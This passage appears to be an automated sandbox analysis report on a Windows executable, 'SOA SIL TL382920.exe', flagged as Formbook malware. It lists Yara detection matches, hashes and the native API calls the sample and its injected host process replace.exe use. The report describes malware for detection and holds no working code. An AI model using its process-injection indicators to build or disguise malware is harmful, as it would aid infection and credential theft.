Source: Yara match	File source: 00000004.00000002.23445436246.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.23442870422.0000000001620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.21337354866.0000000006A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.23445613909.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.SOA SIL TL382920.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.SOA SIL TL382920.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.23445436246.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.23442870422.0000000001620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.21337354866.0000000006A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.23445613909.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0042C303 NtClose,	2_2_0042C303
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018734E0 NtCreateMutant,LdrInitializeThunk,	2_2_018734E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872B90 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_01872B90
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872BC0 NtQueryInformationToken,LdrInitializeThunk,	2_2_01872BC0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872A80 NtClose,LdrInitializeThunk,	2_2_01872A80
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872D10 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01872D10
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872EB0 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_01872EB0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01874260 NtSetContextThread,	2_2_01874260
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01874570 NtSuspendThread,	2_2_01874570
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018729D0 NtWaitForSingleObject,	2_2_018729D0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018729F0 NtReadFile,	2_2_018729F0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018738D0 NtGetContextThread,	2_2_018738D0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872B80 NtCreateKey,	2_2_01872B80
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872BE0 NtQueryVirtualMemory,	2_2_01872BE0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872B00 NtQueryValueKey,	2_2_01872B00
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872B10 NtAllocateVirtualMemory,	2_2_01872B10
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872B20 NtQueryInformationProcess,	2_2_01872B20
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872AA0 NtQueryInformationFile,	2_2_01872AA0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872AC0 NtEnumerateValueKey,	2_2_01872AC0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872A10 NtWriteFile,	2_2_01872A10
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D4260 NtSetContextThread,LdrInitializeThunk,	4_2_031D4260
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D4570 NtSuspendThread,LdrInitializeThunk,	4_2_031D4570
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D34E0 NtCreateMutant,LdrInitializeThunk,	4_2_031D34E0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_031D2B10
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2B00 NtQueryValueKey,LdrInitializeThunk,	4_2_031D2B00
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2B90 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_031D2B90
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2B80 NtCreateKey,LdrInitializeThunk,	4_2_031D2B80
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2BC0 NtQueryInformationToken,LdrInitializeThunk,	4_2_031D2BC0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2A10 NtWriteFile,LdrInitializeThunk,	4_2_031D2A10
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2A80 NtClose,LdrInitializeThunk,	4_2_031D2A80
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2AC0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_031D2AC0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D29F0 NtReadFile,LdrInitializeThunk,	4_2_031D29F0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D38D0 NtGetContextThread,LdrInitializeThunk,	4_2_031D38D0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2F00 NtCreateFile,LdrInitializeThunk,	4_2_031D2F00
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2E00 NtQueueApcThread,LdrInitializeThunk,	4_2_031D2E00
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2E50 NtCreateSection,LdrInitializeThunk,	4_2_031D2E50
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2ED0 NtResumeThread,LdrInitializeThunk,	4_2_031D2ED0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2D10 NtQuerySystemInformation,LdrInitializeThunk,	4_2_031D2D10
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2DA0 NtReadVirtualMemory,LdrInitializeThunk,	4_2_031D2DA0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2C30 NtMapViewOfSection,LdrInitializeThunk,	4_2_031D2C30
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2C50 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_031D2C50
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2CF0 NtDelayExecution,LdrInitializeThunk,	4_2_031D2CF0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2B20 NtQueryInformationProcess,	4_2_031D2B20
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2BE0 NtQueryVirtualMemory,	4_2_031D2BE0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2AA0 NtQueryInformationFile,	4_2_031D2AA0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D29D0 NtWaitForSingleObject,	4_2_031D29D0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2F30 NtOpenDirectoryObject,	4_2_031D2F30
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2FB0 NtSetValueKey,	4_2_031D2FB0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2E80 NtCreateProcessEx,	4_2_031D2E80
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2EB0 NtProtectVirtualMemory,	4_2_031D2EB0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2EC0 NtQuerySection,	4_2_031D2EC0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2D50 NtWriteVirtualMemory,	4_2_031D2D50
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2DC0 NtAdjustPrivilegesToken,	4_2_031D2DC0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2C10 NtOpenProcess,	4_2_031D2C10
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D3C30 NtOpenProcessToken,	4_2_031D3C30
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2C20 NtSetInformationFile,	4_2_031D2C20
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D3C90 NtOpenThread,	4_2_031D3C90
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2CD0 NtEnumerateKey,	4_2_031D2CD0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028D9040 NtClose,	4_2_028D9040
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028D91B0 NtAllocateVirtualMemory,	4_2_028D91B0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028D8EB0 NtReadFile,	4_2_028D8EB0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028D8FA0 NtDeleteFile,	4_2_028D8FA0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028D8D40 NtCreateFile,	4_2_028D8D40

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_015704C0	1_2_015704C0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_01575AF0	1_2_01575AF0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_01571111	1_2_01571111
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_0157C290	1_2_0157C290
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_0157C281	1_2_0157C281
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_0157E438	1_2_0157E438
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_0157E9A0	1_2_0157E9A0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_01578B79	1_2_01578B79
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_0157DA90	1_2_0157DA90
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_0157BE58	1_2_0157BE58
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_004182E3	2_2_004182E3
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00403040	2_2_00403040
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0042E903	2_2_0042E903
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00401210	2_2_00401210
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0040FB53	2_2_0040FB53
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00402370	2_2_00402370
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_004164C3	2_2_004164C3
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0040FD73	2_2_0040FD73
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0040DDF3	2_2_0040DDF3
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018451C0	2_2_018451C0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0190010E	2_2_0190010E
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DD130	2_2_018DD130
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0188717A	2_2_0188717A
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018300A0	2_2_018300A0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184B0D0	2_2_0184B0D0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018F70F1	2_2_018F70F1
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018EE076	2_2_018EE076
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01831380	2_2_01831380
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184E310	2_2_0184E310
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182D2EC	2_2_0182D2EC
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FF5C9	2_2_018FF5C9
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018F75C6	2_2_018F75C6
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0190A526	2_2_0190A526
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840445	2_2_01840445
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018F6757	2_2_018F6757
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01842760	2_2_01842760
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184A760	2_2_0184A760
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840680	2_2_01840680
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FA6C0	2_2_018FA6C0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183C6E0	2_2_0183C6E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FF6F6	2_2_018FF6F6
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DD62C	2_2_018DD62C
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018ED646	2_2_018ED646
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01864670	2_2_01864670
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183E9A0	2_2_0183E9A0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FE9A6	2_2_018FE9A6
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01856882	2_2_01856882
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018458B0	2_2_018458B0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018428C0	2_2_018428C0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018F78F3	2_2_018F78F3
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01843800	2_2_01843800
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018E0835	2_2_018E0835
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01826868	2_2_01826868
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01849870	2_2_01849870
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185B870	2_2_0185B870
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FF872	2_2_018FF872
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018B4BC0	2_2_018B4BC0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840B10	2_2_01840B10
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FFB2E	2_2_018FFB2E
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FFA89	2_2_018FFA89
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FCA13	2_2_018FCA13
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031AE310	4_2_031AE310
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03191380	4_2_03191380
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03162245	4_2_03162245
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0318D2EC	4_2_0318D2EC
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0323D130	4_2_0323D130
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0326010E	4_2_0326010E
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031E717A	4_2_031E717A
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A51C0	4_2_031A51C0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0324E076	4_2_0324E076
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031900A0	4_2_031900A0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031AB0D0	4_2_031AB0D0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_032570F1	4_2_032570F1
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03256757	4_2_03256757
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A2760	4_2_031A2760
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031AA760	4_2_031AA760
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0323D62C	4_2_0323D62C
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031BC600	4_2_031BC600
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0324D646	4_2_0324D646
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031C4670	4_2_031C4670
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A0680	4_2_031A0680
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325F6F6	4_2_0325F6F6
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325A6C0	4_2_0325A6C0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0319C6E0	4_2_0319C6E0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0326A526	4_2_0326A526
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_032575C6	4_2_032575C6
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325F5C9	4_2_0325F5C9
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A0445	4_2_031A0445
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A0B10	4_2_031A0B10
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325FB2E	4_2_0325FB2E
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03214BC0	4_2_03214BC0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325CA13	4_2_0325CA13
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325EA5B	4_2_0325EA5B
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325FA89	4_2_0325FA89
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031BFAA0	4_2_031BFAA0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325E9A6	4_2_0325E9A6
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0319E9A0	4_2_0319E9A0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031699E8	4_2_031699E8
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03240835	4_2_03240835
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A3800	4_2_031A3800
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325F872	4_2_0325F872
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A9870	4_2_031A9870
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031BB870	4_2_031BB870
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03186868	4_2_03186868
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031B6882	4_2_031B6882
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A58B0	4_2_031A58B0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_032578F3	4_2_032578F3
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A28C0	4_2_031A28C0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325FF63	4_2_0325FF63
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325EFBF	4_2_0325EFBF
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03251FC6	4_2_03251FC6
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A6FE0	4_2_031A6FE0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03240E6D	4_2_03240E6D
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031C0E50	4_2_031C0E50
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03250EAD	4_2_03250EAD
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A1EB2	4_2_031A1EB2
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03259ED2	4_2_03259ED2
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325FD27	4_2_0325FD27
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0319AD00	4_2_0319AD00
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03257D4C	4_2_03257D4C
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A0D69	4_2_031A0D69
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031B2DB0	4_2_031B2DB0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A9DD0	4_2_031A9DD0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0323FDF4	4_2_0323FDF4
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03190C12	4_2_03190C12
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031AAC20	4_2_031AAC20
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325EC60	4_2_0325EC60
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03256C69	4_2_03256C69
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0324EC4C	4_2_0324EC4C
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A3C60	4_2_031A3C60
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03239C98	4_2_03239C98
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031B8CDF	4_2_031B8CDF
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0326ACEB	4_2_0326ACEB
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A8CE0	4_2_031A8CE0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031BFCE0	4_2_031BFCE0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028C1950	4_2_028C1950
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028C3200	4_2_028C3200
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028C5020	4_2_028C5020
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028DB640	4_2_028DB640
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028BCAB0	4_2_028BCAB0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028BAB30	4_2_028BAB30
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028BC890	4_2_028BC890
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0306E353	4_2_0306E353
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0306E238	4_2_0306E238
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0306D758	4_2_0306D758
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0306E6EC	4_2_0306E6EC
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0306C9F8	4_2_0306C9F8

Source: C:\Windows\SysWOW64\replace.exe	Code function: String function: 031E7BE4 appears 77 times
Source: C:\Windows\SysWOW64\replace.exe	Code function: String function: 0321EF10 appears 96 times
Source: C:\Windows\SysWOW64\replace.exe	Code function: String function: 0320E692 appears 70 times
Source: C:\Windows\SysWOW64\replace.exe	Code function: String function: 031D5050 appears 34 times
Source: C:\Windows\SysWOW64\replace.exe	Code function: String function: 0318B910 appears 232 times
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: String function: 018AE692 appears 48 times
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: String function: 018BEF10 appears 63 times
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: String function: 0182B910 appears 144 times
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: String function: 01887BE4 appears 54 times

Source: SOA SIL TL382920.exe, 00000001.00000002.20981782115.0000000006D20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SOA SIL TL382920.exe
Source: SOA SIL TL382920.exe, 00000001.00000002.20975794512.00000000012AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SOA SIL TL382920.exe
Source: SOA SIL TL382920.exe, 00000001.00000002.20979757407.0000000004039000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SOA SIL TL382920.exe
Source: SOA SIL TL382920.exe, 00000001.00000002.20979757407.000000000425D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SOA SIL TL382920.exe
Source: SOA SIL TL382920.exe, 00000002.00000002.21275498246.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameREPLACE.EXEj% vs SOA SIL TL382920.exe
Source: SOA SIL TL382920.exe, 00000002.00000002.21276030785.000000000192D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs SOA SIL TL382920.exe
Source: SOA SIL TL382920.exe, 00000002.00000002.21275498246.00000000013BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameREPLACE.EXEj% vs SOA SIL TL382920.exe
Source: SOA SIL TL382920.exe	Binary or memory string: OriginalFilenameQpgk.exe8 vs SOA SIL TL382920.exe

Source: SOA SIL TL382920.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.SOA SIL TL382920.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.SOA SIL TL382920.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.23445436246.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.23442870422.0000000001620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
